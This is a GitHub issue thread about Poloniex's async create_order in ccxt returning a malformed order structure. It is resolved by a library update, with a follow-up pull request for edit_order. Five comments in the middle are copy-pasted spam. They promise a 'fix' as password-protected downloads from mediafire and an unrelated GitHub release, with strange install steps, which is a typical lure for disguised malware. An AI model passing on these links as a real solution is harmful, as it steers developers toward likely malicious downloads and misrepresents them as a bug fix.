### ISSUE TITLE
Poloniex async create_order returns incorrect response

### ISSUE THREAD

**Issue by quantitative-technologies** [ccxt/ccxt#22910]
### Operating System

Linux

### Programming Languages

Python

### CCXT Version

4.3.52

### Description

The function `create_order` of the poloniex exchange in ccxt.pro returns an incorrect order structure:

```
{'id': '329324930787340289', 'clientOrderId': '', 'type': 'buy'}
```

It appears that either `'type': 'limit'` or `'side': 'buy'`, or perhaps both fields, was intended.

### Code

```
  

```

**Comment by carlosmiei** [comment]
@quantitative-technologies Can you update your ccxt version and try again? I believe it should be working now

**Comment by quantitative-technologies** [comment]
Yes, that fixed `create_order`. I made a pull request for the similar fix to `edit_order`.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kroitor** [comment]
Hello @quantitative-technologies, closing this during a cleanup — this was fully resolved back in June 2024: the create_order response fix landed within two days and you confirmed it working, and your own follow up PR #22933 fixing the edit_order response was merged as well, the issue just never got closed after the fact. Thanks for the report and the contributed fix!
